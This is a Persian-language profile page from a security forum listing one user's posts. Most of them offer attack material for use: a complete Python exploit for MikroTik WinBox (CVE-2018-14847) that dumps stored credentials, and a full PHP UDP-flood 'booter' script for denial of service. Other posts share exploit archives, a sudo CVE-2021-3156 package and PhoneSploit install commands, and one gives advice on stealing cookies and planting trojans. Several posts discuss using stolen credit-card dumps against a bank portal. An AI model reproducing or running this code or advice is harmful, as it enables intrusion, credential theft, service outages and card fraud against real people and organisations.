رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Stubborn

ICG Programmer
  • تعداد ارسال ها

    140
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    34
  • Country

    ایران

آخرین بار برد Stubborn در آبان 31

Stubborn یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

136 Excellent

درباره Stubborn

  • درجه
    مسئول برنامه نویسی ICG
  • تاریخ تولد ۹۲/۱۱/۰۴

Converted

  • Name
    Mr.MZ
  • Main os
    Linux
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

1,443 بازدید کننده نمایه
  1. Stubborn

    Golden Dumps Creditcard Bank

    ببخشید سلام . اینم فکر کن بدرد مرحله اول کار بخوره ایا با این تفسیر چنین کاریو میتونم انجام بدم ؟
  2. Stubborn

    Golden Dumps Creditcard Bank

    عالی بود من یکم درمورش جستجو کردم عالی بود کارت هنوزم میشه استفاده کرد فکر کنم روی CKWPortal ها جواب بده https://www.cncbinternational.com/susip/maintenance-c.html جواب میگیریم ایا ؟ ,+
  3. Stubborn

    Bitcoin Wallet Pass Finder

    با سلام و احترام به عزیزان تیم Bitcoin Wallet Pass Finder به کمک این برنامه و ( کمبولیست , فرام ورک و DLL ) میتونین به راحتی پسور های خود را کرک کنید یا کلینت انجام بدید . BTC_PassCrack_140207_en.zip
  4. Stubborn

    CVE Archive Expilot 2014-2018

    با سلام گفتم با شمام به اشتراک بزارم شاید مفید واقع شد Security Vulnerability Database Expilot Archive Apache Struts 2 CVE-2017-5638 CVE-2018-11776 Apache Struts 2 CVE-2017-5638 Apache Struts 2 CVE-2017-9805 Apache Struts 2 CVE-2018-11776 Docker API RCE Drupalgeddon2 CVE-2018-7600 Heartbleed CVE-2014-0160 JBoss CVE-2015-7501 Jenkins CVE-2015-8103 Jenkins CVE-2016-0792 Shellshock CVE-2014-6271 Tomcat CVE-2017-12617 WebLogic CVE-2016-3510 WebLogic CVE-2017-10271 WebLogic CVE-2018-2894 WebSphere CVE-2015-7450 CVE Expilot.zip
  5. Stubborn

    Docker-CVE-2021-3156

    سلام و وقت بخیر خدمت دوستان و کاربران داکر چیست؟ یک ایمیج کانتینر داکر (Container Image) بسته‌ای اجرایی نرم‌افزاری با حجم کم و مستقل است که همه آنچه برای اجرای یک اپلیکیشن مورد نیاز است را در بر می‌گیرد. این موارد شامل کدها، زمان اجرا (Runtime)، ابزارهای سیستمی، کتابخانه‌های سیستمی و تنظیمات لازم است. این Imageها در زمان اجرا به کانتینرها تبدیل می‌شوند و این تبدیل در زمان اجرا روی موتور داکر (Docker‌ Engine) انجام می‌شود. در ادامه مقاله «داکر چیست» به شرح مسئله‌ و چالشی پرداخته شده که نیاز به ابداع داکر را ایجاب کرده است. docker-CVE-2021-3156 Send And Resive #Extert File #Cd File #Install Dockerfile #Install install_sudo1_9_5p1 $bash Run $bash build and Downlaoding docker-CVE-2021-3156-master.zip
  6. Stubborn

    پیدا کردن پسورد گوشی آیفون

    درود بله هست از نرم افزار جیلبریک میتونینن استفاده کنید.
  7. \ بکاپ / با سلام در غیر این صورت پیام خصوصی بدید.
  8. Stubborn

    واقعیت vs تصورات😂😂

    با سلام Ford Simulator 7.0 یه زمان این موضوع برای من به عنوان یه خیال بود با گذشت زمان تحقق پیدا کرد و بهش دست پیدا کردم . با یه کپی براداری ساده و یخورده خلاقیت برای خودم به صورت شخصی به زبانی که یاد گرفته بودم بازنویسی کردم و حالا نمیدونم واقعیته یا تصور . یا حق
  9. Stubborn

    403 bypass

    با سلام و اجازه از استادید و دوست عزیز اگه تارگت ایرانی نیست (خارجی هم انجام نمیشه .) پس به صورت انترواتیک (آکرودرماتیت آنتروپاتیک ) توضیح میدم در 1. شما جوابتونو در پیدا کردن Admin پیج خصوصی سایت یا ادمین Admin2 انجام میشه نیاز به بایپس هک هم پیدا نمیکنید. 2. اما شما با استفاده از لوگ ها و کوکی های به خاستتون میرسید و بازهم نیازی بایپس هک پیدا نمیکنید . 3. یا از طریف روت شدن به سرور و خواندن یوزر های بعد هیدر ها رو بایپس میکنید در htaccess دخیره میکنید و رفرش یا از طریق تروجان ها و بد افزار وب سایت ها میتونیید به خواستتون برسید و من Mysql رو بهتون پیشنهاد میدم که در پست زیر بهتون معرفی میکنم
  10. Stubborn

    هک اندروید

    با سلام در حال جستجو در سطح نت بودم که به یه بحث رسید که جالب بود و خوشحال میشم با شما اشتراک بزارمش بحث ما هک اندروید توسط پایتون است . میشه گفت از کاتولاین برگرفته است PhoneSploit نصب git clone #File cd PhoneSploit pip install colorama python2 main_linux.py دانلود : PhoneSploit-master.zip منبع github حسبی الله
  11. Stubborn

    Mass MikroTik WinBox Exploitation , CVE-2018-14847

    با سلام خدمت اساتید یه اکسپیلوت که با CIDR یا همان ای پی (IPV4) میکروتیک کار میکنه براتون اماده کردم امیدوارم باعث بالا رفتن سطح علمی شما شود . پ . خ : سوالی هست در خدمتم Mass MikroTik WinBox Exploitation , CVE-2018-14847 حسبی الله mikrotikbeast.rar
  12. Stubborn

    CVE-2018-1484 WinBox Resve File Uploader

    به نام خدا با سلام خدمت دوستان . #!/usr/bin/env python3 import socket import sys from extract_user import dump a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00, 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07, 0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21, 0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66, 0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f, 0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73, 0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00] b = [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00, 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01, 0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08, 0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09, 0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00] if __name__ == "__main__": if len(sys.argv) < 2 or (len(sys.argv) == 3 and not str.isdigit(sys.argv[2])) or len(sys.argv) > 3: print("Usage: python3 WinboxExploit.py IP_ADDRESS [PORT]") exit() ip = sys.argv[1] port = 8291 if len(sys.argv) == 3: port = int(sys.argv[2]) #Initialize Socket s = socket.socket() s.settimeout(3) try: s.connect((ip, port)) except Exception as e: print("Connection error: " + str(e)) exit() #Convert to bytearray for manipulation a = bytearray(a) b = bytearray(b) #Send hello and recieve the sesison id s.send(a) try: d = bytearray(s.recv(1024)) except Exception as e: print("Connection error: " + str(e)) exit() #Replace the session id in template b[19] = d[38] #Send the edited response s.send(b) d = bytearray(s.recv(1024)) #Get results print("Connected to " + ip + ":" + str(port)) if len(d[55:]) > 25: print("Exploit successful") dump(d[55:]) else: print("Exploit failed") بحث پابلیکه شده سال 2019 هست اموزش ها توی نت هست :دی
  13. Stubborn

    National Attack With Unknown Hackers

    با سلام لطفا رعایت کنید قوانین ریپلای کردنو بابت این که اسپم نباشه یه توضیح از استراتژی شخصی بنده براتون میزارم. در مرحله اول نیاز به جمع اوری اطلاعات داریم . ( از مشکل و تارگت ) که قوانین خودشو داره در این سناریو احتمال به سرقت رفتن کوکی ها است و با یه حساب سرانگشتی اطلاعات منتشر شده . چ.ن توانایی انتشار فایل ها بصورت اختصاصی نیست با چنتا عکس بحث رو باز میکنم با پیدا کردن یه کوکی از سایت و یه نرم افزار ساده پایتون به اتمام میرسونم . نحوه کرک کوکی ها هم در انجمن پیوست است . حسبی الله
  14. بسم الله الرحمن الرحیم با سلام در این پست با اموزش Web Flag Simple SQL injection ابتدا بررسی میکنیم که به کوکی ها دسترسی داشته باشیم مقدار کلیدی مورد نیاز ما در برنامه اختصاص داده شده است که متغیر است <?php error_reporting(0); include_once("flag.php"); $cookie = $_COOKIE['ISecer']; if(isset($_GET['hint'])){ show_source(__FILE__); } elseif (unserialize($cookie) === "$KEY") { echo "$flag"; } else { ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Login</title> <link rel="stylesheet" href="admin.css" type="text/css"> </head> <body> <br> <div class="container" align="center"> <form method="POST" action="#"> <p><input name="user" type="text" placeholder="Username"></p> <p><input name="password" type="password" placeholder="Password"></p> <p><input value="Login" type="button"/></p> </form> </div> </body> </html> <?php } $KEY='ISecer:www.isecer.com'; ?> پس از تجزیه و تحلیل ، کوکی مورد نیاز برای ضدعفونی شدن برابر مقدار KEY است و سپس می توان پرچم را نشان داد. ابتدا یک قطعه کد php بنویسید ، سعی کنید KEY بعد از سریال سازی یک روش مبهم سازی بسیار قوی پیدا کنید نرم افزار Phpstudy را باز کرده _ ( وظیفه اصلی این نرم افزار ایجاد وب سایت با فایل php است ) فقط این فایل برنامه نویسی را مستقیماً در فهرست اصلی قرار دهید ، اکنون می توانید کوکی ها را مستقیماً وارد کنید. از Burp Suite استفاده کنید ، در ( Send to Repeater ) مقدار کوکی را وارد کنید ، پرچم بیرون می آید و تمام .
  15. Stubborn

    Web Malware

    UDP Flood <html> <head> Hex Booter <?php $ip = $_SERVER['REMOTE_ADDR']; ?> </head> <body> <center> <font color="blue"> <pre> _______(_ | o ,' `. |:::::::::\ | : `--. \ |::::::::::| | (-) \ : |::::::::::| | / @: | |::::::::::| | `: : : |::::::::::| | \- ;/ |::::::::::| | "---'=\ |::::::::::| | ___ / `.\ '-------,--'--.-' ____,:__/`-.:_,-* :' -------'-------`---`-----' `-. _, | --------------------------' `---" | <center><b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font> Don't Dos yourself<br><br></center> </pre> <STYLE> input{ background-color: blue; font-size: 8pt; color: white; font-family: Tahoma; border: 1 solid #666666; } button{ background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666; } body { background-color: #000000; } </style> <?php //UDP if(isset($_GET['host'])&&isset($_GET['time'])){ $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); //print "Started: ".time('d-m-y h:i:s')."<br>"; $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $packets++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n"; echo '<br><br> <form action="'.$surl.'" method=GET> <input type="hidden" name="act" value="phptools"> IP: <br><input type=text name=host><br> Length (seconds): <br><input type=text name=time><br> <input type=submit value=Go></form>'; }else{ echo '<br><b>UDP Flood</b><br> <form action=? method=GET> <input type="hidden" name="act" value="phptools"> IP: <br><input type=text name=host value=><br> Length (seconds): <br><input type=text name=time value=><br><br> <input type=submit value=Go></form>'; } ?> </center> </body> </html>

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...